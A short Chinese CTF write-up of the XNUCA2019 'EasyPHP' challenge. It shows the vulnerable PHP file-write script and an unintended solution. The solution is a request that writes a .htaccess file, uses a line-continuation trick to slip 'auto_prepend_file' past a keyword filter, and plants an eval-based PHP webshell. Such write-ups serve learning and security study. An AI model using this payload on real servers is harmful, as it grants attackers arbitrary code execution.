从一题学习.htaccess

本文最后更新于:2023年10月4日 下午

[TOC]

从一题学习.htaccess

[XNUCA2019Qualifier]EasyPHP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<?php
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    include_once("fl3g.php");
    if(!isset($_GET['content']) || !isset($_GET['filename'])) {
        highlight_file(__FILE__);
        die();
    }
    $content = $_GET['content'];
    if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
        echo "Hacker";
        die();
    }
    $filename = $_GET['filename'];
    if(preg_match("/[^a-z\.]/", $filename) == 1) {
        echo "Hacker";
        die();
    }
    $files = scandir('./'); 
    foreach($files as $file) {
        if(is_file($file)){
            if ($file !== "index.php") {
                unlink($file);
            }
        }
    }
    file_put_contents($filename, $content . "\nJust one chance");
?>

非预期1

1
2
3
?filename=.htaccess&content=php_value auto_prepend_fi\
le ".htaccess"
# <?php @eval($_POST[1]);?> \

image-20231004144813480

CTF
#.htaccess
从一题学习.htaccess
https://leekosss.github.io/2023/10/04/从一题学习htaccess/
作者
leekos
发布于
2023年10月4日
更新于
2023年10月4日
许可协议